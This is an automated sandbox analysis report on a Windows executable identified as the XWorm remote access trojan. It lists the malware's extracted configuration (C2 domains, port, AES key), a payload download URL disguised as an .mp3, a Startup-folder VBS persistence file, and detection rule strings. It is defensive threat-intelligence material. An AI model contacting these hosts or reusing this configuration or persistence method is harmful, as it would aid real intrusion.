Edit tour

Windows Analysis Report
pictures and specifications.exe

Overview

General Information

Sample name:	pictures and specifications.exe
Analysis ID:	1629960
MD5:	ce901f91244366477cd0b769d92f9034
SHA1:	6f49860e768725f78bf3855d18efe329b3553355
SHA256:	1b72e6203b4d26cbe44b55e7df27b3477badd3270cf900bb13c2af47bed80516
Tags:	exeuser-threatcat_ch
Infos:

Detection

XWorm

Score:	100
Range:	0 - 100
Confidence:	100%

Signatures

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Drops script at startup location

Yara detected AntiVM3

Yara detected XWorm

.NET source code contains method to dynamically call methods (often used by packers)

.NET source code contains potential unpacker

.NET source code references suspicious native API functions

C2 URLs / IPs found in malware configuration

Drops VBS files to the startup folder

Initial sample is a PE file and has a suspicious name

Joe Sandbox ML detected suspicious sample

Sample uses string decryption to hide its real strings

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Yara detected Costura Assembly Loader

Allocates memory with a write watch (potentially for evading sandboxes)

Checks if the current process is being debugged

Creates a process in suspended mode (likely to inject code)

Creates a start menu entry (Start Menu\Programs\Startup)

Detected potential crypto function

Drops PE files

Enables debug privileges

HTTP GET or POST without a user agent

One or more processes crash

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Stores files to the Windows start menu directory

Uses 32bit PE files

Yara signature match

Classification

Process Tree

System is w10x64

pictures and specifications.exe (PID: 7300 cmdline: "C:\Users\user\Desktop\pictures and specifications.exe" MD5: CE901F91244366477CD0B769D92F9034)

pictures and specifications.exe (PID: 7476 cmdline: "C:\Users\user\Desktop\pictures and specifications.exe" MD5: CE901F91244366477CD0B769D92F9034)

WerFault.exe (PID: 7676 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7476 -s 928 MD5: C31336C1EFC2CCB44B4326EA793040F2)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
XWorm	Malware with wide range of capabilities ranging from RAT to ransomware.	No Attribution	https://any.run/cybersecurity-blog/xworm-malware-communication-analysis/ https://any.run/cybersecurity-blog/xworm-technical-analysis-of-a-new-malware-version/ https://blog.cyble.com/2022/08/19/evilcoder-project-selling-multiple-dangerous-tools-online/ https://cert.pl/en/posts/2023/10/deworming-the-xworm/ https://cyber.wtf/2025/02/12/unpacking-pyarmor-v8-scripts/	https://malpedia.caad.fkie.fraunhofer.de/details/win.xworm

Malware Configuration

Threatname: Xworm

{"C2 url": ["bin12.ydns.eu", "bin14.ydns.eu", "kingsbkup1.ydns.eu", "smfcs1.ydns.eu", "smfcs3.ydns.eu"], "Port": 4050, "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000002.1811009270.00000000059E0000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000001.00000002.2928492353.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
00000001.00000002.2928492353.0000000000402000.00000040.00000400.00020000.00000000.sdmp	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x6c8f:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x6d2c:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x6e41:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x6b01:$cnc4: POST / HTTP/1.1
00000000.00000002.1798222881.0000000002AA4000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
00000000.00000002.1798222881.0000000002AA4000.00000004.00000800.00020000.00000000.sdmp	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x1148b:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x11528:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x1163d:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x112fd:$cnc4: POST / HTTP/1.1
00000000.00000002.1798222881.00000000028C1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000000.00000002.1798222881.00000000028C1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
00000000.00000002.1798222881.00000000028C1000.00000004.00000800.00020000.00000000.sdmp	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x8fb24:$s8: Win32_ComputerSystem 0xa9933:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0xa99d0:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0xa9ae5:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0xa97a5:$cnc4: POST / HTTP/1.1
Process Memory Space: pictures and specifications.exe PID: 7300	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
Process Memory Space: pictures and specifications.exe PID: 7300	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
Process Memory Space: pictures and specifications.exe PID: 7300	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: pictures and specifications.exe PID: 7476	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
Click to see the 7 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.2.pictures and specifications.exe.59e0000.8.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
0.2.pictures and specifications.exe.2963aa4.0.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
0.2.pictures and specifications.exe.2963aa4.0.unpack	rat_win_xworm_v3	Finds XWorm (version XClient, v3) samples based on characteristic strings	Sekoia.io	0x3be5:$str01: $VB$Local_Port 0x3bd6:$str02: $VB$Local_Host 0x3ee6:$str03: get_Jpeg 0x388e:$str04: get_ServicePack 0x493b:$str05: Select * from AntivirusProduct 0x4b39:$str06: PCRestart 0x4b4d:$str07: shutdown.exe /f /r /t 0 0x4bff:$str08: StopReport 0x4bd5:$str09: StopDDos 0x4cd7:$str10: sendPlugin 0x4d57:$str11: OfflineKeylogger Not Enabled 0x4ebd:$str12: -ExecutionPolicy Bypass -File " 0x4fe6:$str13: Content-length: 5235
0.2.pictures and specifications.exe.2963aa4.0.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x508f:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x512c:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x5241:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x4f01:$cnc4: POST / HTTP/1.1
0.2.pictures and specifications.exe.2963aa4.0.raw.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
0.2.pictures and specifications.exe.2963aa4.0.raw.unpack	rat_win_xworm_v3	Finds XWorm (version XClient, v3) samples based on characteristic strings	Sekoia.io	0x59e5:$str01: $VB$Local_Port 0x59d6:$str02: $VB$Local_Host 0x5ce6:$str03: get_Jpeg 0x568e:$str04: get_ServicePack 0x673b:$str05: Select * from AntivirusProduct 0x6939:$str06: PCRestart 0x694d:$str07: shutdown.exe /f /r /t 0 0x69ff:$str08: StopReport 0x69d5:$str09: StopDDos 0x6ad7:$str10: sendPlugin 0x6b57:$str11: OfflineKeylogger Not Enabled 0x6cbd:$str12: -ExecutionPolicy Bypass -File " 0x6de6:$str13: Content-length: 5235
0.2.pictures and specifications.exe.2963aa4.0.raw.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x6e8f:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x6f2c:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x7041:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x6d01:$cnc4: POST / HTTP/1.1
0.2.pictures and specifications.exe.59e0000.8.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
1.2.pictures and specifications.exe.400000.0.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
1.2.pictures and specifications.exe.400000.0.unpack	rat_win_xworm_v3	Finds XWorm (version XClient, v3) samples based on characteristic strings	Sekoia.io	0x59e5:$str01: $VB$Local_Port 0x59d6:$str02: $VB$Local_Host 0x5ce6:$str03: get_Jpeg 0x568e:$str04: get_ServicePack 0x673b:$str05: Select * from AntivirusProduct 0x6939:$str06: PCRestart 0x694d:$str07: shutdown.exe /f /r /t 0 0x69ff:$str08: StopReport 0x69d5:$str09: StopDDos 0x6ad7:$str10: sendPlugin 0x6b57:$str11: OfflineKeylogger Not Enabled 0x6cbd:$str12: -ExecutionPolicy Bypass -File " 0x6de6:$str13: Content-length: 5235
1.2.pictures and specifications.exe.400000.0.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x6e8f:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x6f2c:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x7041:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x6d01:$cnc4: POST / HTTP/1.1
Click to see the 6 entries

Sigma Signatures

Data Obfuscation

Sigma detected: Drops script at startup location

Source: File created

Author: Joe Security: Data: EventID: 11, Image: C:\Users\user\Desktop\pictures and specifications.exe, ProcessId: 7300, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IsPrimitive.vbs

Suricata Signatures

⊘No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 00000000.00000002.1798222881.00000000028C1000.00000004.00000800.00020000.00000000.sdmp

Malware Configuration Extractor: Xworm {"C2 url": ["bin12.ydns.eu", "bin14.ydns.eu", "kingsbkup1.ydns.eu", "smfcs1.ydns.eu", "smfcs3.ydns.eu"], "Port": 4050, "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe"}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Roaming\IsPrimitive.exe

ReversingLabs: Detection: 36%

Multi AV Scanner detection for submitted file

Source: pictures and specifications.exe	Virustotal: Detection: 36%			Perma Link
Source: pictures and specifications.exe	ReversingLabs: Detection: 36%

Joe Sandbox ML detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Sample uses string decryption to hide its real strings

Source: 00000000.00000002.1798222881.00000000028C1000.00000004.00000800.00020000.00000000.sdmp	String decryptor: bin12.ydns.eu,bin14.ydns.eu,kingsbkup1.ydns.eu,smfcs1.ydns.eu,smfcs3.ydns.eu
Source: 00000000.00000002.1798222881.00000000028C1000.00000004.00000800.00020000.00000000.sdmp	String decryptor: 4050
Source: 00000000.00000002.1798222881.00000000028C1000.00000004.00000800.00020000.00000000.sdmp	String decryptor: <123456789>
Source: 00000000.00000002.1798222881.00000000028C1000.00000004.00000800.00020000.00000000.sdmp	String decryptor: <Xwormmm>
Source: 00000000.00000002.1798222881.00000000028C1000.00000004.00000800.00020000.00000000.sdmp	String decryptor: DOGGY XWORM
Source: 00000000.00000002.1798222881.00000000028C1000.00000004.00000800.00020000.00000000.sdmp	String decryptor: USB.exe

Source: pictures and specifications.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: pictures and specifications.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: \??\C:\Windows\System.pdbCp source: pictures and specifications.exe, 00000001.00000002.2928927089.00000000013F4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Desktop\pictures and specifications.PDB source: pictures and specifications.exe, 00000001.00000002.2928637040.0000000000DF7000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\System.pdbpdbtem.pdb source: pictures and specifications.exe, 00000001.00000002.2928927089.0000000001398000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.pdbN\|2h\|2 Z\|2_CorDllMainmscoree.dll source: pictures and specifications.exe, 00000001.00000002.2928927089.00000000013C4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: pictures and specifications.exe, 00000000.00000002.1812113869.0000000005CE0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\Desktop\pictures and specifications.PDBV source: pictures and specifications.exe, 00000001.00000002.2928927089.0000000001398000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: pictures and specifications.exe, 00000000.00000002.1812113869.0000000005CE0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: protobuf-net.pdbSHA256}Lq source: pictures and specifications.exe, 00000000.00000002.1811855695.0000000005C90000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\dll\System.pdbf source: pictures and specifications.exe, 00000001.00000002.2928927089.0000000001398000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: protobuf-net.pdb source: pictures and specifications.exe, 00000000.00000002.1811855695.0000000005C90000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\System.pdb source: pictures and specifications.exe, 00000001.00000002.2928927089.00000000013F4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\symbols\dll\System.pdb source: pictures and specifications.exe, 00000001.00000002.2928927089.0000000001383000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: ##.pdb source: pictures and specifications.exe, 00000001.00000002.2928637040.0000000000DF7000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\dll\System.pdb06A source: pictures and specifications.exe, 00000001.00000002.2928927089.0000000001398000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.pdb source: pictures and specifications.exe, 00000001.00000002.2928927089.00000000013C4000.00000004.00000020.00020000.00000000.sdmp

Networking

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: bin12.ydns.eu
Source: Malware configuration extractor	URLs: bin14.ydns.eu
Source: Malware configuration extractor	URLs: kingsbkup1.ydns.eu
Source: Malware configuration extractor	URLs: smfcs1.ydns.eu
Source: Malware configuration extractor	URLs: smfcs3.ydns.eu

Source: global traffic

HTTP traffic detected: GET /never/lookinto/it/panel/uploads/Qwprueqkjqe.mp3 HTTP/1.1Host: win32.ydns.euConnection: Keep-Alive

Source: unknown

UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

HTTP traffic detected: GET /never/lookinto/it/panel/uploads/Qwprueqkjqe.mp3 HTTP/1.1Host: win32.ydns.euConnection: Keep-Alive

Source: global traffic

DNS traffic detected: DNS query: win32.ydns.eu

Source: pictures and specifications.exe, 00000000.00000002.1798222881.0000000002821000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: pictures and specifications.exe, 00000000.00000002.1798222881.0000000002821000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://win32.ydns.eu
Source: pictures and specifications.exe, 00000000.00000002.1798222881.0000000002821000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://win32.ydns.eu/never/lookinto/it/panel/uploads/Qwprueqkjqe.mp3
Source: pictures and specifications.exe, IsPrimitive.exe.0.dr	String found in binary or memory: http://win32.ydns.eu/never/lookinto/it/panel/uploads/Qwprueqkjqe.mp312c051VsJF24a5QJoEmnRyw==
Source: pictures and specifications.exe, 00000000.00000002.1811855695.0000000005C90000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://github.com/mgravell/protobuf-net
Source: pictures and specifications.exe, 00000000.00000002.1811855695.0000000005C90000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://github.com/mgravell/protobuf-netJ
Source: pictures and specifications.exe, 00000000.00000002.1811855695.0000000005C90000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://github.com/mgravell/protobuf-neti
Source: pictures and specifications.exe, 00000000.00000002.1811855695.0000000005C90000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/11564914/23354;
Source: pictures and specifications.exe, 00000000.00000002.1798222881.00000000028C1000.00000004.00000800.00020000.00000000.sdmp, pictures and specifications.exe, 00000000.00000002.1811855695.0000000005C90000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/14436606/23354
Source: pictures and specifications.exe, 00000000.00000002.1811855695.0000000005C90000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/2152978/23354

System Summary

Malicious sample detected (through community Yara rule)

Source: 0.2.pictures and specifications.exe.2963aa4.0.unpack, type: UNPACKEDPE	Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
Source: 0.2.pictures and specifications.exe.2963aa4.0.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0.2.pictures and specifications.exe.2963aa4.0.raw.unpack, type: UNPACKEDPE	Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
Source: 0.2.pictures and specifications.exe.2963aa4.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 1.2.pictures and specifications.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
Source: 1.2.pictures and specifications.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000001.00000002.2928492353.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000000.00000002.1798222881.0000000002AA4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000000.00000002.1798222881.00000000028C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen

Initial sample is a PE file and has a suspicious name

Source: initial sample

Static PE information: Filename: pictures and specifications.exe

Source: C:\Users\user\Desktop\pictures and specifications.exe	Code function: 0_2_00E51858	0_2_00E51858
Source: C:\Users\user\Desktop\pictures and specifications.exe	Code function: 0_2_00E51D2E	0_2_00E51D2E
Source: C:\Users\user\Desktop\pictures and specifications.exe	Code function: 0_2_00E5C2E0	0_2_00E5C2E0
Source: C:\Users\user\Desktop\pictures and specifications.exe	Code function: 0_2_00E5246A	0_2_00E5246A
Source: C:\Users\user\Desktop\pictures and specifications.exe	Code function: 0_2_00E5C870	0_2_00E5C870
Source: C:\Users\user\Desktop\pictures and specifications.exe	Code function: 0_2_00E51AA1	0_2_00E51AA1
Source: C:\Users\user\Desktop\pictures and specifications.exe	Code function: 0_2_00E51DB1	0_2_00E51DB1
Source: C:\Users\user\Desktop\pictures and specifications.exe	Code function: 0_2_063DF6E0	0_2_063DF6E0
Source: C:\Users\user\Desktop\pictures and specifications.exe	Code function: 0_2_063DF998	0_2_063DF998
Source: C:\Users\user\Desktop\pictures and specifications.exe	Code function: 0_2_063C0006	0_2_063C0006
Source: C:\Users\user\Desktop\pictures and specifications.exe	Code function: 0_2_063C0040	0_2_063C0040
Source: C:\Users\user\Desktop\pictures and specifications.exe	Code function: 0_2_063DE0C0	0_2_063DE0C0
Source: C:\Users\user\Desktop\pictures and specifications.exe	Code function: 1_2_02D90B92	1_2_02D90B92

Source: C:\Users\user\Desktop\pictures and specifications.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7476 -s 928

Source: pictures and specifications.exe, 00000000.00000002.1810009628.0000000005570000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameOamehya.dll" vs pictures and specifications.exe
Source: pictures and specifications.exe, 00000000.00000002.1797795488.000000000099E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs pictures and specifications.exe
Source: pictures and specifications.exe, 00000000.00000002.1798222881.00000000028C1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameDOGGY XWORM.exe4 vs pictures and specifications.exe
Source: pictures and specifications.exe, 00000000.00000002.1808302356.0000000003831000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameDOGGY12.exe0 vs pictures and specifications.exe
Source: pictures and specifications.exe, 00000000.00000002.1798222881.0000000002B43000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameDOGGY XWORM.exe4 vs pictures and specifications.exe
Source: pictures and specifications.exe, 00000000.00000002.1811855695.0000000005C90000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs pictures and specifications.exe
Source: pictures and specifications.exe, 00000000.00000002.1798222881.000000000284E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilename vs pictures and specifications.exe
Source: pictures and specifications.exe, 00000000.00000002.1812113869.0000000005CE0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs pictures and specifications.exe
Source: pictures and specifications.exe, 00000000.00000000.1664734166.0000000000472000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameDOGGY12.exe0 vs pictures and specifications.exe
Source: pictures and specifications.exe, 00000001.00000002.2928927089.0000000001358000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs pictures and specifications.exe
Source: pictures and specifications.exe, 00000001.00000002.2928492353.0000000000402000.00000040.00000400.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameDOGGY XWORM.exe4 vs pictures and specifications.exe
Source: pictures and specifications.exe	Binary or memory string: OriginalFilenameDOGGY12.exe0 vs pictures and specifications.exe

Source: pictures and specifications.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: 0.2.pictures and specifications.exe.2963aa4.0.unpack, type: UNPACKEDPE	Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
Source: 0.2.pictures and specifications.exe.2963aa4.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0.2.pictures and specifications.exe.2963aa4.0.raw.unpack, type: UNPACKEDPE	Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
Source: 0.2.pictures and specifications.exe.2963aa4.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 1.2.pictures and specifications.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
Source: 1.2.pictures and specifications.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000001.00000002.2928492353.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000000.00000002.1798222881.0000000002AA4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000000.00000002.1798222881.00000000028C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT

Source: pictures and specifications.exe, DetachedMapper.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: IsPrimitive.exe.0.dr, DetachedMapper.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.pictures and specifications.exe.2963aa4.0.raw.unpack, Helper.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.pictures and specifications.exe.2963aa4.0.raw.unpack, Helper.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.pictures and specifications.exe.2963aa4.0.raw.unpack, AlgorithmAES.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.pictures and specifications.exe.38314f0.5.raw.unpack, DetachedMapper.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: 0.2.pictures and specifications.exe.5ce0000.10.raw.unpack, ITaskFolder.cs	Task registration methods: 'RegisterTaskDefinition', 'RegisterTask'
Source: 0.2.pictures and specifications.exe.5ce0000.10.raw.unpack, TaskFolder.cs	Task registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'
Source: 0.2.pictures and specifications.exe.5ce0000.10.raw.unpack, Task.cs	Task registration methods: 'RegisterChanges', 'CreateTask'
Source: 0.2.pictures and specifications.exe.5ce0000.10.raw.unpack, TaskService.cs	Task registration methods: 'CreateFromToken'

Source: 0.2.pictures and specifications.exe.2963aa4.0.raw.unpack, ClientSocket.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.pictures and specifications.exe.2963aa4.0.raw.unpack, ClientSocket.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.pictures and specifications.exe.5ce0000.10.raw.unpack, TaskSecurity.cs	Security API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
Source: 0.2.pictures and specifications.exe.5ce0000.10.raw.unpack, TaskSecurity.cs	Security API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
Source: 0.2.pictures and specifications.exe.5ce0000.10.raw.unpack, Task.cs	Security API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: 0.2.pictures and specifications.exe.5ce0000.10.raw.unpack, TaskFolder.cs	Security API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: 0.2.pictures and specifications.exe.5ce0000.10.raw.unpack, TaskPrincipal.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.pictures and specifications.exe.5ce0000.10.raw.unpack, User.cs	Security API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)

Source: classification engine

Classification label: mal100.troj.expl.evad.winEXE@4/3@1/1

Source: C:\Users\user\Desktop\pictures and specifications.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IsPrimitive.vbs

Jump to behavior

Source: C:\Users\user\Desktop\pictures and specifications.exe	Mutant created: NULL
Source: C:\Users\user\Desktop\pictures and specifications.exe	Mutant created: \Sessions\1\BaseNamedObjects\56TvElZMbqDoRvU7
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7676:64:WilError_03

